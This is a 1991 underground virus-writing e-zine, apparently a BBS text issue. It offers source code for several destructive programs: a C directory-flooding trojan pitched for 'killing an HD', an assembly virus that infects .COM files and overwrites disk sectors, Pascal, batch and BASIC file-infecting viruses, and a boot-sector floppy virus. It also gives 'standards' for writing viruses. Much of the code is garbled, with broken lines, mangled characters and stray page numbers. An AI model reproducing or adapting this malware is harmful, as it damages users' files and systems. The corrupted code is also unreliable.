                    @@@@@@@@@@@               @@@@@@@@@@@@@
                    @                                     @
                    @       Virili And Trojan Horses      @
                    @                                     @
                    @    A ProtagonistYs Point Of View    @
                    @                                     @
                    @              Issue #2               @
                    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


 -----------------------------------------------------------------------------
 2.1  Title Page, Introduction, & TOC....................... Doctor Dissector
 2.2  Another Explanation Of Virili And Trojans............. Acid Phreak
 2.3  V-IDEA-1.............................................. Ashton Darkside
 2.4  V-IDEA-2.............................................. Ashton Darkside
 2.5  The Generic Virus..................................... Doctor Dissector
 2.6  Aids.................................................. Doctor Dissector
 2.7  Batch File Virus...................................... PHUN 3.2
 2.8  Basic Virus........................................... PHUN 3.2
 2.9  The Alemeda Virus..................................... PHUN 4.3


=========================================================================
Subject:  INTVT Issue 2 1/1
To:       tk0jut2
                    The International Network of Thieves    2/16/91
                         Virus and Trojan Oriented
                               Volume No. 2
Welcome back!  Hey guys, (and gals I hope!) error in last issue, the date
was incorrect.  The actual date of INT/VT1.TXT should have been 1/29/91.  
Sorry dudez, had some people think it was a year old...  Ok, geez, 
already issue two? You people have been waiting for it haven't you?  GOOD!

SOME INFORMATION ABOUT DEBUG
----------------------------
     Since not everyone has Turbo Debugger, sNOOp, or some of the nicer
de-buggers, we're going to stick with using the DOS debug.  Those of you who
already write virii and or are familiar with debug, you may want to skip this
                                                                                                     9
section and pick up later down in the article.  This is for the beginners to
debug.  Here are some of the basic listing of commands for debug:

  COMMAND / USAGE          / COMMENTS
    A       A[address]       A0100:0100  Start assembling at address 0100:0100
    C       C[range address] CC100,1FF 300 Compare portion of memory
    D       D[range]         D0100  Displays the contents of memory at 0100
    F       F[range list]    F0100 L 100 fill 100 bytes
    G       G[address]       G runs the current program
    H       H[values]        H 100 108  ads and subtracts hex numbers
    I       I[value]         I2F8 input one byte from port specified
    M       M[range address] move blocks of memory
    N       N[name]          Names file (i.e. N Joe.exe)
    Q       Q                Terminates Debug
    R       R[register]      Shows the register and edit it
    S       S[range list]    Search the specified range for bytes
                                                                                            cpi-2 (p10
    T       T                Trace through program
    W       W[amt. of bytes] Save to disk
     While these are not explained in great detail, it is not neccessary to
do so at this time, but as we use them it will be.  I recommend you go to the
bookstore and purchase Peter Norton's Guide to Assembly Language.  It will run
you about $25.00 and then download MASM5.0 from The EoD.  MASM stand for
Microsoft Assembler, for you who are new to this.  Also available are Turbo C
and Turbo C++ v2.00 and Turbo Pascal v6.00.  Feel free to call and D/L these
files.  Reading Peter Norton's book will make what you find here much easier.
Also, it will teach you how to program in assembler.  Something we DO NOT plan
to do here, but to sharpen your knowledge, or HELP you learn it.  Something els
e
you need is the BOOK of INT's.  Soon to be available on The EoD.

LESSON 2, ANOTHER SIMPLE TROJAN IN C
Our last trojan was in ASM, this one is in C.  And known as Crazy.  What it
does is makes tons of directories on someones HD.  You say, "ooo, big deal."
Exactly, its a VERY BIG deal.  In DOS, you can not remove more than one DIR at
a time.  Can you imagine removing all of those DIR's by hand?  It could take
weeks, months, or years.


#include        <stdio.h>
#include        <stdlib.h>  /* Include Files */
#include        <dir.h>    /* Used by C to make life easier */

main()
{
        char tmp[20];
        char far *ptr;
                                                                                                     2

        for (i=0;i<=50;i++){   /* random loop to make dirs */
                srand(rand());
                ptr = itoa(rand(),tmp,10);
                mkdir ( ptr ); /* makes the DIR */
                chdir ( ptr );
                for (j=0;j<=50;j++){
                        ptr = itoa(rand(),tmp,10);
                        mkdir( ptr );
                chdir ("\\");
        }
}
     While we are not going deep into how this works, we give you the source
so you can compile it and have some real nice fun killing an HD.  If you would
like the compiled version (EXE version) you can get it off of many BBS's
including The EoD.



*******************************************************************************
DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES
                               
                                                                     20
   ONLY! The author does NOT condone  the use of this information in any manner
   that would be illegal or harmful. The fact that the author knows and spreads
   this information in no way suggests that he uses it. The author also accepts
   no responsibility  for the  malicious use of this  information by anyone who
   reads it! Remember, we may talk alot, but we ojust say no@ to doing it.
*******************************************************************************





     C O R R U P T E D   P R* * *   present   * * *

            CPI Virus Standards - Protect yourself and your friends
                    By Ashton Darkside (DUNE / SATAN / CPI)


*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
   ONLY! The author does NOT condone  the use of this information in any manner
                                                                                                     8
   that would be illegal or harmful. The fact that the author knows and spreads
   this information in no way suggests that he uses it. The author also accepts
   no responsibility  for the  malicious use of this  information by anyone who
   reads it! Remember, we may talk alot, but we ojust say no@ to doing it.
*******************************************************************************







        One of the  main problems with viruses is that  once you set one loose,
it is no longer under your control.  I propose to stop this by introducing some
standards of  virus writing that will  enable them to  be deactivated  whenever
they enter a ZfriendlyY (CPI) system.  In the long run,  even the author of the
virus is not immune to being attacked. The following are what I have termed the
CPI standards for writing viruses.  They will allow a virus to easily check any
                                                                                                     9
system they are  being run on  for a type of Zidentity badgeY.  If it is found,
the virus will  not infect the  system it is being run on.  The other standards
are mostly written around this.

CPI Standards for writing viruses -

        1 - required  that  activation  periods  begin on January 1  and end on
            December 31. This will coincide  with the changing  identity codes.

        2 - The virus will check for an  identity code by  executing Interrrupt
            12h  with the  following register  settings:  AX - 4350, BX - 4920,
            CX - AB46, DX - 554E.  If the system  is  friendly, then a  pointer
            will be returned in CX:DX to an ASCIIZ (0-terminated) string  which
            will have different contents in different years.  The codes are not
            to be included in any text file,  and should only  be given through
            me  mail at  The Andromeda Strain BBS.  If a system  is detected as
            is ok  to display a  little  greeting message  about  how lucky the
            user was.

==============================================================================
                                   Generic Virus

==============================================================================

;=============================================================================

MAIN:
      NOP                       ;| Marker bytes that identify this program
      NOP                       ;| as infected/a virus
                                                                                                     4
      NOP                       ;|

      MOV AX,00                 ;| Initialize the pointers
      MOV ES:[POINTER],AX       ;|
      MOV ES:[COUNTER],AX       ;|
      MOV ES:[DISKS B],AL       ;|

      MOV AH,19                 ;| Get the selected drive (dir?)
      INT 21                    ;|

      MOV CS:DRIVE,AL           ;| Get current path (save drive)
      MOV AH,47                 ;| (dir?)
      MOV DH,0                  ;|
      ADD AL,1                  ;|
      MOV DL,AL                 ;| (in actual drive)
      LEA SI,CS:OLD_PATH        ;|
      INT 21                    ;|
      MOV AH,0E                    Find # of drives
      MOV DL,0                    
                                                                                                     5
      INT 21
      CMP AL,01                 ;| (Check if only one drive)
      JNZ HUPS3                    (If not one drive, go the HUPS3)
        V AL,06                 ;| Set pointer to SEARCH_ORDER +6 (one drive)
      HUPS3: MOV AH,0           ;| Execute this if there is more than 1 drive
      LEA BX,SEARCH_ORDER       ;|
      ADD BX,AX                   
      ADD BX,0001
      MOV CS:POINTER,BX         ;|
      CLC                       ;|

CHANGE_DISK:                       Carry is set if no more .COM files are
      JNC NO_NAME_CHANGE        ;| found. From here, .EXE files will be
        V AH,17                    renamed to .COM (change .EXE to .COM)
        A DX    MASKE_EXE       ;| to large to fit in memory@ when starting
      CMP AL,0FF                ;| larger infected programs
      JNZ NO_NAME_CHANGE        ;| (Check if an .EXE is found)

                                                                                                     6
      MOV AH,2CH                   If neither .COM or .EXE files can be found,
      INT 21                       then random sectors on the disk will be
      MOV BX,CS:[BX]               in milliseconds. This is the time of the
      MOV BX,DX                 ;| complete oinfection@ of a storage medium.
      MOV CX,2                     The virus can find nothing more to infect
      MOV DH,0                  ;| starts its destruction.
      INT 26                       (write crap on disk)

NO_NAME_CHANGE:                    Check if the end of the search order table
      MOV BX,CS:POINTER            has been reached. If so, end.
      DEC BX                    ;|
      MOV CS:POINTER,BX         ;|
      MOV DL,CS:[BX]            ;|
      CMP DL,0FF                ;|
      JNZ HUPS2                 ;|
      JMP HOPS                    

HUPS2:                          ;| Get a new drive from the search order table
      MOV AH,0E                 ;| and select it, beginning with the ROOT dir.
                                                                                                     7
      INT 21                       (change drive)
      MOV AH,3B                    (change path)
      LEA DX,PATH               ;|
      INT 21                    ;|
      JMP FIND_FIRST_FILE       ;|

FIND_FIRST_SUBDIR:                 S ing from the root, search for the
      MOV AH,17                    first subdir. First, (change .exe to .com)
      LEA DX,CS:MASKE_EXE       ;| convert all .EXE files to .COM in the
      INT 21                       old directory.
        V AH,3B                    (use root directory)
      LEA DX,PATH
      INT 21           
        V AH,04E                   (search for first subdirectory)
      MOV CX,00010001B             (dir mask)
      LEA DX,MASKE_DIR
      INT 21  
      JC CHANGE_DISK            ;|
      MOV BX,CS:COUNTER         ;|
      INC BX                      
                                                                                                     8
      DEC BX                      
      JZ  USE_NEXT_SUBDIR       ;|

FIND_NEXT_SUBDIR:                  Search for the next sub-dir, if no more
      MOV AH,4FH                ;| are found, the (search for next subdir)
      INT 21                    ;| drive will be changed.
      JC CHANGE_DISK            ;|
      DEC BX                      
      JNZ FIND_NEXT_SUBDIR      ;|

USE_NEXT_SUBDIR:
      MOV AH,2FH                   Select found directory. (get dta address)

      ADD BX,1CH                ;|
        V ES:[BX],W@\@              address of name in dta)
      INC BX          
      PUSH DS
      MOV AX,ES     
        V DS,AX        
      MOV DX,BX
                                                                                                     9
      MOV AH,3B                    (change path)
      INT 21             
      POP DS                    ;|
      MOV BX,CS:COUNTER         ;|
      INC BX                    ;|
      MOV CS:COUNTER,BX         ;|

FIND_FIRST_FILE:                   Find first .COM file in the current dir.
      MOV AH,04E                ;| If there are none, (Search for first)
      MOV CX,00000001B          ;| search the next directory. (mask)
      LEA DX,MASKE_COM          ;|
      INT 21                    ;|
      JC FIND_FIRST_SUBDIR
      JMP CHECK_IF_ILL

FIND_NEXT_FILE:                    If program is ill (infected) then search
      MOV AH,4FH                   for another. (search for next)
      INT 21   
      JC FIND_FIRST_SUBDIR

                                                                                                    40
CHECK_IF_ILL:                      Check if already infected by virus.
      MOV AH,3D                    (open channel)
      MOV AL,02                    (read/write)
        V DX,9EH                   (address of name in dta)
        T BX,AX                    (save channel)
      MOV AH,3FH                ;| (read file)
      MOV CH,BUFLEN             ;|
        V DX,BUFFER                (write in buffer)
      INT 21                    ;|
      MOV AH,3EH                   (close file)

      MOV BX,CS:[BUFFER]        ;| (look for three NOPYs)
      CMP BX,9090     
      JZ FIND_NEXT_FILE         ;|
              3                    This section by-passes (write enable)
      MOV AL,0                     the MS/PC DOS Write Protection.
      MOV DX,9EH                ;| (address of name in dta)
      INT 21                    ;|
                                                                                                     1
      MOV AL,01                   
      AND CX,11111110B          ;|
      INT 21                    ;|
        V AL,02                    access (read/write)
        V DX,9EH                   (address of name in dta)
      INT 21                    ;|
        V BX,AX                    Read date entry of program and (channel)
      MOV AH,57                    save for future use. (get date)
        V AL,0                  ;|
      INT 21     
      PUSH CX                      (save date)
      PUSH DX                   ;|
        V DX,CS:[CONTA W]       ;| T   jump located at 0100h (save old jmp)
        V CS:[JMPBUF],DX        ;| the program will be saved for future use.
      MOV DX,CS:[BUFFER+1]      ;| (save new jump)
                                                                                                     2
      LEA CX,CONT-100
      SUB DX,CX
      MOV CS:[CONTA],DX
      MOV AL,1                     to the start of the file.
      POP DX                      
      POP CX                        restore date)

      MOV AH,3EH                ;| (close file)
      INT 21                      
        V DX,CS:[JMPBUF]        ;| Restore the old jump address. The virus
      MOV CS:[CONTA],DX            at address oCONTA@ the jump which was at the
                                   start of the program. This is done to
HOPS:                              preserve the executability of the host
      NOP                       ;| program as much as possible. After saving,
      CALL USE_OLD              ;| it still works with the jump address in the
                                ;| virus. The jump address in the virus differs
                                ;| from the jump address in memory
                                                                                                     3

CONT  DB  0E9                      Continue with the host program (make jump)
CONTA DW  0            
      MOV AH,00                 ;|
      INT 21                      

USE_OLMOV AH,0E                    Reactivate the selected (use old drive)
      MOV DL,CS:DRIVE              drive at the start of the program, and
      INT 21                       reactivate the selected path at the start
      MOV AH,3B                    of the program.(use old drive)
      LEA DX,OLD_PATH-1         ;| (get old path and backslash)
      INT 21                    ;|
      RET                       ;|

SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF

POINTER      DW   0000             (pointer f. search order)
COUNTER      DW   0000             (counter f. nth. search)
DISKS        DB   0                (number of disks)
                                                                                                                                                   4
MASKE_COM    DB o*.COM@,00      ;| (search for com files)
MASKE_DIR    DB o*@,00             (search for dirYs)
MASKE_EXE    DB 0FF,0,0,0,0,0,00111111XB
             DB 0,@????????EXE@,0,0,0,0
             DB 0,@????????COM@,0
MASKE_ALL    DB 0FF,0,0,0,0,0,00111111XB
             DB 0,@???????????@,0,0,0,0
             DB 0,@????????COM@,0

BUFFER EQU 0E00                    (a safe place)

BUFLEN EQU 208H                 ;| Length of virus. Modify this accordingly
                                   if you modify this source. Be careful
                                   for this may change!

JMPBUF EQU BUFFER+BUFLEN        ;| (a safe place for jmp)

PATH  DB o\@,0                      first place)
DRIVE DB 0                          actual drive)
BACK_SLASH DB o\@
                                                                                                     5
OLD_PATH DB 32 DUP (?)              old path)
============================================================================
                                  AIDS Virus
============================================================================
{ Beginning of source code, Turbo Pascal 3.01a }
{C-}
{U-}
{I-}       { Wont allow a user break, enable IO check }

{ -- Constants --------------------------------------- }

Const
     VirusSize = 13847;    { AIDSYs code size }
                                                                                                     8
     Warning   :String[42]     { Warning message }
     = ZThis File Has Been Infected By AIDS! HaHa!Y;

{ -- Type declarations------------------------------------- }

Type
     DTARec    =Record      { Data area for file search }
     DOSnext  :Array[1..21] of Byte;
                   Attr    : Byte;Ftime,
                   FDate,
                   FLsize,
                   FHsize  : Integer;
                   FullName: Array[1..13] of Char;
                 End;

Registers    = Record    {Register set used for file search }
   Case Byte of
   1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
                                                                                                     9
   2 : (AL,AH,BL,BH,CL,CH,DL,DH          : Byte);
   End;

{ -- Variables--------------------------------------------- }

Var
                               { Memory offset program code }
   Pr                                     { Infected marker }
   MarkInfected : String[42] absolute Cseg:$180;
   Reg          : Registers;                 { Register set }
   DTA          : DTARec;                       { Data area }
   Buffer       : Array[Byte] of Byte;        { Data buffer }
   TestID       : String[42]; { To recognize infected files }
   UsePath      : String[66];        { Path to search files }
                                    { Lenght of search path }
   UsePathLenght: Byte absolute UsePath;
   Go           : File;                    { File to infect }
   B            : Byte;                              { Used }
   LoopVar      : Integer;  {Will loop forever}
                                                                                                    50

{ -- Program code------------------------------------------ }

BeGetDir(0, UsePath);               { get current directory }
  ifUsePath := UsePath + Z\Y;
  UsePath := UsePath + Z*.COMY;        { Define search mask }
  Reg.AH := $1A;                            { Set data area
  Reg.DS := Seg(DTA);
  Reg.DX := Ofs(DTA);
  MsDos(Reg);
  UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0
  Reg.AH := $4E;
  Reg.DS := Seg(UsePath);
  Reg.DX := Ofs(UsePath[1]);
  Reg.CX := $ff;          { Set attribute to find ALL files }
  MsDos(Reg);                   { Find first matching entry
  IF not Odd(Reg.Flags) Then         { If a file found then
    Repeat
                                                                                                     1
      UsePath := DTA.FullName;
      B := Pos(#0, UsePath);
      If B > 0 then
      Delete(UsePath, B, 255);             { Remove garbage }
      Assign(Go, UsePath);
      If IOresult = 0 Then          { If not IO error then }
      Begin
        BlockRead(Go, Buffer, 2);
        Move(Buffer[$80], TestID, 43);
                      { Test if file already ill(Infected) }
        If TestID <> Warning Then        { If not then ... }
        Begin
          Seek (Go, 0);
                            { Mark file as infected and .. }
          MarkInfected := Warning;
                                               { Infect it }
          BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
          Halt;                   {.. and halt the program }
                                                                                                     2
        End;
        Close(Go);
        { The file has already been infected, search next. }
      Reg.AH := $4F;
      Reg.DS := Seg(DTA);
      Reg.DX := Ofs(DTA);
    Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
beWriteln(Z






                                                                                                     3


Y);                          {Give a lot of smiles}
Writeln(ZY);
Writeln(Z     Y);
Writeln(Z                                 ATTENTION:
 Y);
Writeln(Z      I have been elected to inform you that throughout your process o
fY);
Writeln(Z     collecting and executing files, you have accidentally H^Z^ZK?

Y
);
Writeln(Z      yourself over; again, thatYZs PHUCKED yourself over. No, it cann
o
t Y);
Writeln(Z      be; YES, it CAN be, a w^ZD^Zs has infected your system. Now what
d
o
 Y);
Writeln(Z      you have to say about that? HAHAHAHA. Have H^Z__ with this one an

  Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
 H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list 
-- press space for next page --                                                                      4
Y);
Writeln(Z                       remember, there is NO cure for
 Y);
W       Z
 Y);
W                 7777777777     777777777777    77777777777      7777777777

W                777^~^~^~^~^~^~777     ^~^~^~^~77^~^~^~^~^~^~   77^~^~^~^~^~^~^

~777    777^~^~^~^~^~^~^~77

Writ^~^~
 Y);
Writeln(Z        77^~       77^~        77^~        77^~       77^~   77^~
 Y);
Writeln(Z        777777777777^~        77^~        77^~       77^~   77777777777

7
 Y);
Writeln(Z        77^~^~^~^~^~^~^~^~77^~        77^~        77^~       77^~    ^~

^~^~^~^~^~^~^~^~77^~
 Y);
Writeln(Z        77^~       77^~        77^~        77^~       77^~77^~ Y);
Writeln(Z        77^~       77^~        77^~        77^~      777^~   7Y);
Writlln(         77^~       77^~   777777777777    77777777777^~^~    7777777777^~^~Y);
Writeln(Z         ^~^~        ^~^~    ^~^~^~^~^~^~^~^~^~^~^~^~    ^~^~^~^~^~^~^~
Writeln(Z^~^~^~^~      ^~^~^~^~^~^~^~^~^~^~W       ZY);
Writeln(Z     Y);
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.

{ Although this is a primitive virus its effective. }
{ In this virus only the .COM                       }
{ files are infected. Its about 13K and it will     }
{ change the date entry.                            }


[2.7]

                            Batch Viruses
                            -------------


Whoever thought that viruses could be in BATCH file.This virus which we

are about to see makes use of MS-DOS operating system. This BATCH virus
uses DEBUG & EDLIN programs.

Name: VR.BAT

echo = off         ( Self explanatory)
ctty nul           ( This is important. Console output is turned off)
                                                                                                     7
path c:\msdos      ( May differ on other systems )
dir *.com/w>ind    ( The directory is written on oind@ ONLY name entries)

edlin ind<1        ( oInd@ is processed with EDLIN so only file names appear)
debug ind<2        ( New batch program is created with debug)
edlin name.bat<3   ( This batch goes to an executable form because of EDLIN)
ctty con           ( Console interface is again assigned)
name               ( Newly created NAME.BAT is called.


In addition to file to this Batch file,there command files,here named 1,2,3

Here is the first command file:
-------------------------------
Name: 1

1,4d               ( Here line 1-4 of the oIND@ file are deleted )
e                  ( Save file )

Here is the second command file:
                                                                                                     8
--------------------------------
Name: 2

m100,10b,f000       First program name is moved to the F000H address to save

e108 o.BAT@        (Extention of file name is changed to .BAT)
m100,10b,f010       File is saved again)
e100@DEL o          DEL command is written to address 100H)
mf000,f00b,104     (Original file is written after this command)
e10c 2e            (Period is placed in from of extension)
e110 0d,0a         (Carrige return+ line feed)
mf010,f020,11f     ( Modified file is moved to 11FH address from buffer area)
e112 oCOPY \VR.BAT@ ( COPY command is now placed in front of file)
e12b od,0a         (COPY command terminated with carriage return + lf)
rxc                ( The CX register is ... )
2c                 ( set to 2CH)
nname.bat            Name it NAME.BAT)
w                    Write )
q                  ( quit )

                                                                                                     9

The third command file must be printed as a hex dump because it contains
2 control characters (1Ah=Control Z) and this is not entirely printable.

Hex dump of the third command file:
-----------------------------------
Name: 3

0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
       1  ,  1  ?        .  .  n  y  y  y  y  y  y  y
0110   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
       y     .  2  ,  ?  ?  r     .  .  n  n  y  y  y
0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
       y  y  y  y     .  E  .  .  .  .  .  .  .  .  .


In order for this virus to work VR.BAT should be in the root. This program
only affects .COM files.


                                                                                                    60
[2.8]
                           Viruses in Basic
                           ----------------


Basic is great language and often people think of it as a limited language
and will not be of any use in creating something like a virus. Well you are
really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
files.To do this you must compile the source code using a the Microsoft
Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
the source code to place the lenght of the object program in the LENGHTVIR
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
available, the LENGHTVIR variable must be set to the lenght of the linked
                                                                                                     1

program and remember to use /e parameter when compiling.



10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$=@BV3.EXE@
110 REM *** WRITE THE DIRECTORY IN THE FILE oINH@
130 SHELL oDIR *.EXE>INH@
140 REM ** OPEN oINH@ FILE AND READ NAMES **
150 OPEN oR@,1,@INH@,32000
160 GET #1,1
                                                                                                     2
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOT 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** o%@ IS THE MARKER OF THE BV3
250 REM ** o%@ IN THE NAME MEANS
260 REM  ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)=@%@ THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)=@.@
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=@ o OR MID$ (ORIGINAL$,F,1)=@.@ OR F=13 THEN
GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
                                                                                                     3
360 ON ERROR GOTO 210
365 TEST$=@o
370 REM ++ OPEN FILE FOUND +++
380 OPEN oR@,2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431     ++ CHECK IF PROGRAM IS ILL ++
44      ++ o%@ AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST,2,1)=@%@ THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)=@%@
499 REM ++++ SANE oHEALTHY@ PROGRAM ++++
510 C$=@COPY o+ORIGINAL$+@ o+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$=@COPY o+VIRROOT$+ORIGINAL$
                                                                                                     4
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUYPUT MESSAGE ++
640 PRINT oINFECTION IN o ;ORIGIANAL$; o  !! BE WARE !!@
650 SYSTEM
660     ** VIRUS ERROR MESSAGE
670 PRINT oVIRUS INTERNAL ERROR GOTTCHA !!!!@:SYSTEM
680 END


This basic virus will only attack .EXE files. After the execution you will
see a oINH@ file which contains the directory, and the file %SORT.EXE.
Programs which start with o%@ are NOT infected ,they pose as back up copies.


Subject:  CPI Issue 2 9/11
To:       tk0jut2
                                                                                                     5
Original_To:  BITNET%"tk0jut2@niu"


;[2.9]
;-----------------------------------------------------------------------;
; This virus is of the oFLOPPY ONLY@ variety.                           ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory.  It redirects the keyboard       ;
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time  ;
; it will attempt to infect any floppy it finds in drive A:.            ;
; It keeps the real boot sector at track 39, sector 8, head 0           ;
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus                     ;
; will die.  It also contains no anti detection mechanisms as does the  ;
; BRAIN virus.  It apparently uses head 0, sector 8 and not head 1      ;
; sector 9 because this is common to all floppy formats both single     ;
; sided and double sided.  It does not contain any malevolent TROJAN    ;
; HORSE code.  It does appear to contain a count of how many times it   ;
; has infected other diskettes although this is harmless and the count  ;
; is never accessed.                                                    ;
                                                                                                     6
;                                                                       ;
; Things to note about this virus:                                      ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
; is its primary (only for that matter) means of reproduction to other  ;
; floppy diskettes.  The only way to remove it from an infected system  
; is to turn the machine off and reboot an uninfected copy of DOS.
; It is even resident when no floppy is booted but BASIC is loaded      ;
; instead.  Then when ALT-CTRL-DEL is pressed from inside of BASIC,
; it activates and infectes the floppy from which the user is         
; attempting to boot.                                       
;                                                            
; Also note that because of the POP CS command to pass control to       ;
; its self in upper memory, this virus does not to work on 80286
; machines (because this is not a valid 80286 instruction).           
;                                                                 
; If your assembler will not allow the POP CS command to execute, replace;
; the POP CS command with an NOP and then assemble it, then debug that
; part of the code and place POP CS in place of NOP at that section. 
;                                                                     
; The Norton Utilities can be used to identify infected diskettes by
                                                                                                                                                   7
; looking at the boot sector and the DOS SYS utility can be used to
; remove it (unlike the Pakistani Brain).
;-----------------------------------------------------------------------
                        ;
    ORG  7C00H               ;
                        ;
TOS LABEL     WORD           ;TOP OF STACK
;-----------------------------------------------------------------------
; 1. Find top of memory and copy ourself up there. (keeping same offset)
; 2. Save a copy of the first 32 interrupt vectors to top of memory too
; 3. Redirect int 9 (keyboard) to ourself in top of memory
; 4. Jump to ourself at top of memory                            
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8
;-----------------------------------------------------------------------
BEGIN:   CLI                 ;INITIALIZE STACK
    XOR  AX,AX               ;
    MOV  SS,AX               ;
    MOV  SP,offset TOS       ;
    STI                 ;
                        ;
                                                                                                     8
    MOV  BX,0040H       ;ES = TOP OF MEMORY - (7C00H+512)
    MOV  DS,BX               ;
    MOV  ES,AX               ;
                        ;
    PUSH CS             ;DS = CS
    POP  DS             ;
    CMP  DI,3456H       ;IF THE VIRUS IS REBOOTING...
    JNE  B_10           ;
    DEC  Word Ptr [COUNTER_1]     ;...LOW&HI:COUNTER_1--
                        ;
B_10MOV  DI,SI
    REP  MOVSB               ;

                                                                                                     9
         SI,CX     ;CX=0          ;SAVE FIRST 32 INT VETOR ADDRESSES TO
         DI,offset BEGIN - 128    ;   128 BYTES BELOW OUR HI CODE
                        ;CALL PUT_NEW_09       SAVE/REDIRECT INT 9 (KEYBOARD)

         E    ;ES=HI    ;   JUMP TO OUR HI CODE WITH
    MOV  BX,SP              SP=7C00  ;LOAD REAL BOOT SECTOR TO 0000:7C00
    MOV  DX,CX          ;CX=0        ;DRIVE A: HEAD 0
         CX,2708H       ;   TRACK 40, SECTOR 8
    JB   $              ;   HANG IF ERROR

                                                       ;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR                                       ;
;                                                                       ;
; ON ENTRY:   DS = 0                                                    ;
;        ES = WHERE TO SAVE OLD_09 & (HI)                               ;
;             WHERE NEW_09 IS         (HI)                              ;
;-----------------------------------------------------------------------;
PUT_MOV  SI,9*4              ;COPY INT 9 VECTOR TO
         DI,offset OLD_09    ;   OLD_09 (IN OUR HI CODE!)
    MOV  [(9*4)+2],ES        ;
                                   STI                 ;

    RET                 ;
                        ;
;-----------------------------------------------------------------------
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR
;-----------------------------------------------------------------------
ACK_KEYBD:                   ;
    IN   AL,61H              ;RESET KEYBOARD THEN CONTINUE
    JMP  RBOOT  

;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION                           ;
; REASON UNKNOWN                                                        ;
;-----------------------------------------------------------------------;
                                                                                                     2
TABLE    DB   27H,0,1,2      ;FORMAT INFORMATION FOR TRACK 39DB  DB   27H,0,4,2
    DB   27H,0,5,2      ;
    DB   27H,0,6,2      ;
    DB   27H,0,7,2      ;
                        ;
;A7CDW   00026H

;L7CA1:                      ;
    POP  CX             ;NOT USED
    POP  DI             ;
    POP  SI             ;
                                                                                                     3
                        ;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ...                                          ;
; IF ALT & CTRL & ? THEN ...                                            ;
;-----------------------------------------------------------------------;
NEW_PUSH DS
     USH CS             ;DS=CS
           
                                   MOV  BX,[ALT_CTRL W]     ;BX=SCAN CODE LAST T
IN  CMP  AL,1DH              ;IS IT A [CTRL]...
    JNE  N09_10              ;...JUMP IF NO
    MOV  BL,AH               ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
    JMP  N09_30              ;
                        ;
N09_       
N09_JE   N09_X0              ;...JUMP IF YES
                                   JE   ACK_KEYBD      ;..                        ;
N09_30:  MOV  [ALT_CTRL],BX       ;SAVE SCAN CODE FOR NEXT TIME

N09_POPF                ;

    DB   0EAH           ;JMP F000:E987
OLD_                    ;
N09_X0:  JMP  N09_X1              ;
                        ;
;-----------------------------------------------------------------------;
;                                                                       ;
;-----------------------------------------------------------------------;
RBOOT:   MOV  DX,03D8H        DISABLE COLOR VIDEO !?!?
                                   CALL DELAY               ;
    MOV  [ALT_CTRL],AX  ;AX=0     ;

    MOV  AL,3 ;AH=0           SELECT 80x25 MOV  AH,2               ;SET CURSOR P
XOR INT  10H            ;
    MOV  CX,0607H
    INT  10H            ;

    MOV  AX,0420H       ;DELAY (AL=20H FOR EOI BELOW)
    CALL DELAY               ;
                        ;
    CLI                 ;
                                   OUT  20H,AL               ;SEND EOI TO INT CO
    MOV  SI,offset BEGIN - 128    ;
                        ;
    MOV  Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
